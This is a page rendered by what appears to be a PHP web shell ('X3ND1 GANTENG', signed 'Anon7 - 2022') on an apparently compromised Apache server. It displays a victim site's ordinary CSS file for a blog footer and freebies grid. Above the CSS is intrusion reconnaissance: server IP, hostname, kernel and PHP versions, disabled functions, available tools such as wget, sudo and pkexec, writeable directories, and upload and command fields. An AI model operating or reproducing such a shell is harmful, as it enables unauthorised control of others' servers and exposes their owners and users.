X3ND1 GANTENG
Server IP : 108.163.255.210  /  Your IP : 18.226.186.153
Web Server : Apache
System : Linux blossom.urlnameserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User :  ( 1172)
PHP Version : 7.2.34
Disable Function : eval,escapeshellarg,proc_close,proc_get_status,proc_nice,proc_open,symlink,system,pcntl_exec,getrusage,chown,chgp,closelog,openlog,syslog,define_syslog_variables,php_ini_loaded_file,getservbyname,getservbyport,posix_getgid,posix_getgrgid,proc_terminate,pfsockopen,apache_child_terminate,posix_mkfifo,posix_setpgid,posix_setuid,hypot,pg_host,pos,posix_access,posix_getcwd,posix_getservbyname,myshellexec,getpid,posix_getsid,posix_isatty,posix_kill,posix_mknod,posix_setgid,posix_setsid,posix_setuid,posix_times,posix_uname,ps_fill,posix_getpwuid,global,ini_restore,zip_open,zip_read,rar_open,bzopen,bzread,bzwrite,apache_get_modules,apache_get_version,phpversionphpinfo,php_ini_scanned_files,get_current_user,disk_total_space,diskfreespace,leak,imap_list,hypo,filedump,safe_mode,getmygid,apache_getenv,apache_setenv,bzread,bzwrite,bzopen,phpini,higlight_file,dos_conv,get_cwd,er_log,cmd,e_name,vdir,get_dir,only_read,ftok,ftpexec,posix_getpwnam,mysql_list_dbs,disk_free_space,session_save_path,confirm_phpdoc_compiled,zip_entry_rea,php_u,psockopen,crack_opendict,crack_getlastmessage,crack_closedict,crack_check,fpassthru,posix_get_last_error,posix_getlogin,posix_getgroups,posix_strerror,posix_getrlimit,posix_getpgrp,posix_getgrnam,pos,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/unilinki/www/Website-HTML/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ BERANDA ]     

Current File : /home/unilinki/www/Website-HTML/css/footer-blog.css
.freebies-module {
    padding: 100px 0;
}
.freebies-module a {
    text-decoration: none;
}
.freebies-module--header {
    font-family: AvertaStd;
    font-size: 36px;
    font-weight: bold;
    font-style: normal;
    font-stretch: normal;
    line-height: 1.44;
    letter-spacing: normal;
    text-align: center;
    color: #000;
}
.freebies-module .separator {
    position: relative;
    width: 28px;
    height: 2px;
    display: inherit;
    background-color: #87C500;
    margin: 0px auto 0px auto;
}
.freebies-module #freebies-show-more {
    display: block;
    margin: 0 auto;
    width: 10em;
}
.freebies-module--container {
    display: grid;
    grid-template-columns: auto;
    grid-column-gap: 17px;
}
.freebies--tile {
    text-align: center;
    margin-bottom: 60px;
    cursor: pointer;
    box-shadow:2px 2px 2px 2px rgba(0, 0, 0, 0.15);
    margin: 10px;
}
.freebies--tile__hidden {
    display: none;
}
.freebies--description{
    padding: 10px;
}
.freebies--tile__img-wrapper {
    margin: 0;
    width: 100%;
    height: calc(80vw - 60px);
    max-height: 480px;
    overflow: hidden;
    transition: box-shadow .4s ease;
    position: relative;
}
.freebies--tile__img-wrapper div {
    background: center center no-repeat;
    background-size: cover;
    height: 100%;
    transition: all 500ms ease !important;
}
.freebies--tile:hover .freebies--tile__img-wrapper {
    /* -webkit-box-shadow: 0px 30px 30px 0px rgba(0, 0, 0, 0.15);
    -moz-box-shadow: 0px 30px 30px 0px rgba(0, 0, 0, 0.15);
    box-shadow: 0px 30px 30px 0px rgba(0, 0, 0, 0.15); */
    border: 8px solid #87C500;
}
.freebies--tile:hover .freebies--tile__img-wrapper div {
    transform: scale(1.1);
}
.freebies--tile .freebies--tile__img-wrapper img {
    position: absolute;
    top: calc(50% - 16px);
    left: calc(50% - 16px);
    opacity: 0;
    transition: opacity .4s ease;
}
.freebies--tile .freebies--tile__img-wrapper .iconsList {
    position: absolute;
    top: calc(50% - 16px);
    left: calc(50% - 16px);
    opacity: 0;
    transition: opacity .4s ease;
    color: #87C500;
    font-size: 40px;
}
.freebies--tile:hover .freebies--tile__img-wrapper .iconsList {
    opacity: 1;
}
.freebies--tile:hover .freebies--tile__img-wrapper img {
    opacity: 1;
}
.freebies--tile .freebies--tile__img-wrapper .overlay {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: #121212;
    opacity: 0;
    transition: opacity .4s ease;
}
.freebies--tile:hover .freebies--tile__img-wrapper .overlay {
    opacity: .6;
}
.freebies--tile .freebies--tile__title {
    margin-top: 42px;
    display: block;
    max-width: 233px;
    font-family: AvertaStd;
    font-size: 21px;
    font-weight: bold;
    font-style: normal;
    font-stretch: normal;
    line-height: 1.52;
    text-align: left;
    letter-spacing: normal;
    color: #000;
    transition: color .4s ease;
}
.freebies--tile:hover .freebies--tile__title {
    color: #87C500;
}
.freebies--tile__description {
    font-family: AvertaStd;
    font-size: 14px;
    font-weight: 100;
    font-style: normal;
    font-stretch: normal;
    line-height: 1.71;
    letter-spacing: normal;
    color: #4b4b4b;
    text-align: left;
    margin-top: 16px;
    display: block;
}
.freebies--tile__shops {
    margin-top: 32px;
    text-align: left;
}
.freebies--tile__shops a {
    margin-right: 16px;
}
.freebies--tile__shops img {
    max-width: 135px;
    height: auto;
}
@media(min-width:650px) {
    .freebies-module--container {
    grid-template-columns: repeat(1, 1fr);
}
.freebies--tile__img-wrapper {
    margin: 0px;
    height: 20vw;
    max-height: 280px;
}
}@media screen and (min-width:992px) {
    .freebies-module--container {
    grid-template-columns: repeat(1, 1fr);
    padding: 30px 0 0;
}
}

#footer-blog-section .owl-dots .owl-dot span {
    width: 10px;
    height: 10px;
    margin: 5px 7px;
    background: #ffffff;
    display: block;
    -webkit-backface-visibility: visible;
    transition: opacity .2s ease;
    border-radius: 30px;
    border: #87C500 solid 1px;
}
#footer-blog-section .owl-dots .owl-dot.active span, #footer-blog-section .owl-dots .owl-dot:hover span {
    background: #87C500;
}

#footer-blog-section .owl-prev {
    position: absolute;
    right: 55%;
}

#footer-blog-section .owl-dots .owl-dot.active span {
    position: absolute;
}
#footer-blog-section .owl-next {
    left: 55%;
    position: absolute;
}
#footer-blog-section .owl-stage-outer {
      margin-bottom: 20px;
}

#footer-blog-section  .owl-dot {
    position: absolute;
    right: 50%;
}

Anon7 - 2022
SCDN GOK